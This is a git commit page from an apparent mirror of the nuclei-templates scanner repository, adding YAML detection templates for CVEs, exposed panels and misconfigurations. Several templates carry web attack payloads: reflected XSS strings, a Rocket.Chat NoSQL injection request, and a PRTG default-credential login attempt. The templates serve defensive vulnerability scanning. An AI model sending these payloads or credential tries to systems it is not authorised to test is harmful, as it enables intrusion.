daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into master

patch-1
Veshraj Ghimire 2022-10-03 16:41:30 +05:45 committed by GitHub
parent b35cce1d81 7633a5e287
commit 0d5ed545fb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
26 changed files with 2520 additions and 2052 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
.new-additions
View File

@ -1,26 +0,0 @@
cves/2016/CVE-2016-10368.yaml
cves/2017/CVE-2017-17736.yaml
cves/2019/CVE-2019-8086.yaml
cves/2020/CVE-2020-13820.yaml
cves/2020/CVE-2020-2733.yaml
cves/2021/CVE-2021-25104.yaml
cves/2021/CVE-2021-36873.yaml
cves/2022/CVE-2022-2546.yaml
cves/2022/CVE-2022-2551.yaml
cves/2022/CVE-2022-2633.yaml
cves/2022/CVE-2022-31814.yaml
default-logins/aem/aem-felix-console.yaml
default-logins/oracle/peoplesoft-default-login.yaml
exposed-panels/aircube-login.yaml
exposed-panels/oracle-business-intelligence.yaml
exposed-panels/webpagetest-panel.yaml
exposures/files/sendgrid-env.yaml
file/bash/bash.yaml
misconfiguration/aem/aem-bulkeditor.yaml
misconfiguration/aem/aem-custom-script.yaml
misconfiguration/aem/aem-dump-contentnode.yaml
technologies/moveit-transfer-detect.yaml
technologies/oracle/oracle-access-manager-detect.yaml
technologies/zend-server-test-page.yaml
vulnerabilities/other/webpagetest-ssrf.yaml
vulnerabilities/wordpress/age-gate-xss.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
| cve | 1459 | daffainfo | 633 | cves | 1438 | info | 1491 | http | 3929 |
| panel | 667 | dhiyaneshdk | 606 | exposed-panels | 674 | high | 1066 | file | 77 |
| edb | 573 | pikpikcu | 329 | vulnerabilities | 515 | medium | 776 | network | 52 |
| lfi | 513 | pdteam | 270 | technologies | 287 | critical | 513 | dns | 17 |
| xss | 504 | geeknik | 193 | exposures | 281 | low | 228 | | |
| wordpress | 430 | dwisiswant0 | 169 | misconfiguration | 246 | unknown | 14 | | |
| exposure | 419 | 0x_akoko | 167 | token-spray | 230 | | | | |
| cve2021 | 356 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 138 | default-logins | 106 | | | | |
| wp-plugin | 327 | pussycat0x | 135 | file | 77 | | | | |
**297 directories, 4270 files**.
**299 directories, 4307 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

3973
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
| cve | 1459 | daffainfo | 633 | cves | 1438 | info | 1491 | http | 3929 |
| panel | 667 | dhiyaneshdk | 606 | exposed-panels | 674 | high | 1066 | file | 77 |
| edb | 573 | pikpikcu | 329 | vulnerabilities | 515 | medium | 776 | network | 52 |
| lfi | 513 | pdteam | 270 | technologies | 287 | critical | 513 | dns | 17 |
| xss | 504 | geeknik | 193 | exposures | 281 | low | 228 | | |
| wordpress | 430 | dwisiswant0 | 169 | misconfiguration | 246 | unknown | 14 | | |
| exposure | 419 | 0x_akoko | 167 | token-spray | 230 | | | | |
| cve2021 | 356 | princechaddha | 151 | workflows | 190 | | | | |
| rce | 340 | ritikchaddha | 138 | default-logins | 106 | | | | |
| wp-plugin | 327 | pussycat0x | 135 | file | 77 | | | | |

43
cves/2020/CVE-2020-20285.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2020-20285
info:
name: zzcms - Reflected XSS
author: edoardottt
severity: medium
description: |
There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php
reference:
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-20285
cwe-id: CWE-79
metadata:
fofa-query: zzcms
verified: "true"
tags: cve,cve2020,zzcms,xss
requests:
- raw:
- |
GET /user/login.php HTTP/1.1
Host: {{Hostname}}
Referer: xss"/><img src="#" onerror="alert(document.domain)"/>
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'fromurl" type="hidden" value="xss"/><img src="#" onerror="alert(document.domain)"/>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

2
cves/2020/CVE-2020-35489.yaml
View File

@ -7,7 +7,7 @@ info:
description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-35489
- https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload/
- https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/
- https://wordpress.org/plugins/contact-form-7/#developers
- https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/
classification:

12
cves/2020/CVE-2020-36289.yaml
View File

@ -24,17 +24,19 @@ requests:
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'rel=\"admin\"'
- type: word
part: header
words:
- 'application/json'
part: header
- type: status
status:
- 200

49
cves/2021/CVE-2021-22911.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2021-22911
info:
name: RocketChat - NoSQL injection
author: tess,sullo
severity: critical
description: Rocket.Chat server versions 3.11, 3.12 and 3.1 allow unauthenticated access to an API endpoint which leads to NoSQL injection in the database.
reference:
- http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html
- https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911
- https://hackerone.com/reports/1130721
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-22911
cwe-id: CWE-89
metadata:
shodan-query: http.title:"Rocket.Chat"
verified: "true"
tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021
requests:
- raw:
- |-
POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"message": "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^{{randstr}}\"}}] }"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '[error-invalid-user]'
- '"success":true'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200

43
cves/2022/CVE-2022-1910.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2022-1910
info:
name: Shortcodes and extra features for Phlox theme < 2.9.8 - Cross-Site-Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47
- https://wordpress.org/plugins/auxin-elements/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1910
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1910
cwe-id: CWE-79
metadata:
verified: "true"
tags: wordpress,xss,auxin-elements,wpscan,cve,cve2017,wp-plugin,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'widget-title"><script>alert(document.domain)</script></h3>'
- 'aux-widget'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

2
cves/2022/CVE-2022-36804.yaml
View File

@ -18,7 +18,7 @@ info:
cwe-id: CWE-77
metadata:
shodan-query: http.component:"BitBucket"
tags: cve,cve2022,bitbucket,atlassian
tags: cve,cve2022,bitbucket,atlassian,kev
variables:
data: '{{rand_base(5)}}'

45
cves/2022/CVE-2022-38553.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2022-38553
info:
name: Academy Learning Management System < v5.9.1 - Reflected XSS
author: edoardottt
severity: medium
description: |
Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.
reference:
- https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
- https://github.com/4websecurity/CVE-2022-38553
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
- https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38553
cwe-id: CWE-79
metadata:
google-query: intext:"Study any topic, anytime"
verified: "true"
tags: cve,cve2022,academylms,xss
requests:
- method: GET
path:
- '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>'
- 'Study any topic'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

43
default-logins/prtg-default-login.yaml Normal file
View File

@ -0,0 +1,43 @@
id: prtg-default-login
info:
name: PRTG Network Monitor Default Login
author: johnk3r
severity: high
description: PRTG default admin credentials were discovered.
reference:
- https://www.paessler.com/manuals/prtg/login
classification:
cwe-id: CWE-798
metadata:
shodan-query: http.favicon.hash:-655683626
tags: prtg,default-login
requests:
- raw:
- |
POST /public/checklogin.htm HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginurl=&username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- prtgadmin
password:
- prtgadmin
matchers-condition: and
matchers:
- type: word
part: header
words:
- "OCTOPUS"
- "/home"
condition: and
- type: status
status:
- 302

30
exposed-panels/remedy-axis-login.yaml Normal file
View File

@ -0,0 +1,30 @@
id: remedy-axis-login
info:
name: Remedy Axis Login
author: tess
severity: info
metadata:
shodan-query: http.html:"BMC Remedy"
verified: true
tags: panel,remedy,bmc
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/arsys/shared/login.jsp'
- '{{BaseURL}}/rsso/admin/'
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "BMC&nbsp;Remedy&nbsp;Mid&nbsp;Tier&nbsp;"
- "Remedy Login Page"
- "BMC Remedy"
- "BMC Smart Reporting"
condition: or

33
exposed-panels/somansa-dlp-detect.yaml Normal file
View File

@ -0,0 +1,33 @@
id: somansa-dlp-detect
info:
name: Somansa DLP Center Detection
author: gy741,ritikchaddha
severity: info
reference:
- https://www.somansa.com/solution/integrated_solution/dlp/
metadata:
verified: true
shodan-query: http.html:"DLP system"
tags: panel,somansa,dlp
requests:
- method: GET
path:
- "{{BaseURL}}/DLPCenter/loginform.sms"
- "{{BaseURL}}/DLPCenter/images/favicon.ico"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- "/DLPCenter/js/"
- "SOMANSA"
condition: and
case-insensitive: true
- type: dsl
dsl:
- "status_code==200 && (\"-1217239281\" == mmh3(base64_py(body)))"

26
exposed-panels/wampserver-homepage.yaml Normal file
View File

@ -0,0 +1,26 @@
id: wampserver-homepage
info:
name: WAMPSERVER Homepage
author: DhiyaneshDk
severity: info
metadata:
verified: true
shodan-query: title:"WAMPSERVER Homepage"
tags: panel,wampserver
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>WAMPSERVER Homepage</title>"
- type: status
status:
- 200

20
exposed-panels/xenforo-login.yaml
View File

@ -1,20 +0,0 @@
id: xenforo-login
info:
name: XenForo Login/Register
author: dhiyaneshDk
severity: info
metadata:
shodan-query: http.title:"XenForo"
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/index.php'
matchers:
- type: word
words:
- '<title>XenForo</title>'
condition: and

11
iot/hp-color-laserjet-detect.yaml
View File

@ -1,13 +1,14 @@
id: hp-color-laserjet-detect
info:
name: HP Color LaserJet detection
name: HP Color LaserJet Detection
author: idealphase,gy741
severity: info
reference:
- http://www.hp.com/
- https://www.hp.com/us-en/shop/cv/printers
metadata:
verified: true
shodan-query: http.title:"HP Color LaserJet"
google-query: intitle:"HP Color LaserJet"
tags: iot,hp
@ -16,15 +17,21 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/hp/device/this.LCDispatcher"
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>HP Color LaserJet"
- "HP Color LaserJet"
- '<td class="mastheadTitle"><h1>HP Color LaserJet'
- '<strong class="product">HP Color LaserJet'
- '<a href="info_deviceStatus.html?'
condition: or
- type: status
status:

2
misconfiguration/aem/aem-dump-contentnode.yaml
View File

@ -16,7 +16,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/content.infinity.json"
- "{{BaseURL}}{{path}}"
- "{{BaseURL}}/{{path}}"
iterate-all: true
extractors:

33
misconfiguration/atlassian-bamboo-build.yaml Normal file
View File

@ -0,0 +1,33 @@
id: atlassian-bamboo-build
info:
name: Atlassian Bamboo Build Dashboard
author: DhiyaneshDK
severity: unknown
metadata:
verified: true
shodan-query: title:"Build Dashboard - Atlassian Bamboo"
tags: misconfig,atlassian,bamboo
requests:
- method: GET
path:
- "{{BaseURL}}/allPlans.action"
matchers-condition: and
matchers:
- type: word
words:
- "<th>Project</th>"
- "<th>Plan</th>"
- "<th>Build</th>"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

38
misconfiguration/gitea-public-signup.yaml Normal file
View File

@ -0,0 +1,38 @@
id: gitea-public-signup
info:
name: Gitea Public Registration Enabled
author: edoardottt
severity: high
description: |
A misconfiguration in Gitea allows arbitrary users to sign up and read code hosted on the service.
reference:
- https://www.youtube.com/watch?v=oHhofSj9lEM&t=157s
- https://gitea.io/en-us/
metadata:
verified: true
shodan-query: html:"Powered by Gitea"
tags: misconfig,gitea
requests:
- method: GET
path:
- '{{BaseURL}}/user/sign_up'
matchers-condition: and
matchers:
- type: word
words:
- 'Powered by Gitea Version'
- 'Register -'
condition: and
- type: word
part: body
words:
- "Registration is disabled. Please contact your site administrator."
negative: true
- type: status
status:
- 200

30
misconfiguration/unauth-kubecost.yaml Normal file
View File

@ -0,0 +1,30 @@
id: unauth-kubecost
info:
name: KubeCost - Unauthenticated Dashboard Exposure
author: pussycat0x
severity: medium
reference: https://www.facebook.com/photo?fbid=470414125129112&set=pcb.470413798462478
metadata:
verified: true
shodan-query: title:kubecost
tags: misconfig,exposure,unauth,kubecost
requests:
- method: GET
path:
- '{{BaseURL}}/overview.html'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Cluster Overview | Kubecost</title>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

5
technologies/fingerprinthub-web-fingerprints.yaml
View File

@ -15074,4 +15074,9 @@ requests:
words:
- Powered by <a href='http://zzzcms.com'>ZZZcms</a>
- type: word
name: bitwarden
words:
- <title page-title>Bitwarden Web Vault</title>
# Enhanced by cs on 2022/02/08

1
technologies/oracle/oracle-access-manager-detect.yaml
View File

@ -13,6 +13,7 @@ requests:
path:
- '{{BaseURL}}/oamfed/idp/soap'
matchers-condition: and
matchers:
- type: word
part: body

27
technologies/xenforo-detect.yaml Normal file
View File

@ -0,0 +1,27 @@
id: xenforo-detect
info:
name: XenForo Forum Detection
author: dhiyaneshDk,daffainfo
severity: info
metadata:
shodan-query: http.title:"XenForo"
tags: tech,xenforo
requests:
- method: GET
path:
- '{{BaseURL}}/index.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<html id="XenForo"'
- '<html id="XF"'
condition: or
- type: status
status:
- 200

34
vulnerabilities/wordpress/unauthenticated-duplicator-disclosure.yaml Normal file
View File

@ -0,0 +1,34 @@
id: unauthenticated-duplicator-disclosure
info:
name: WordPress Duplicator Plugin - Information disclosure
author: tess
severity: medium
description: |
Unauthenticated Information disclosure of Duplicator WordPress plugin sensitive files.
metadata:
verified: true
tags: wordpress,wp,wp-plugin,misconfig,disclosure,unauth,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
- "{{BaseURL}}/wp-content/backups-dup-lite"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Index of /wp-content/backups-dup-lite/'
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200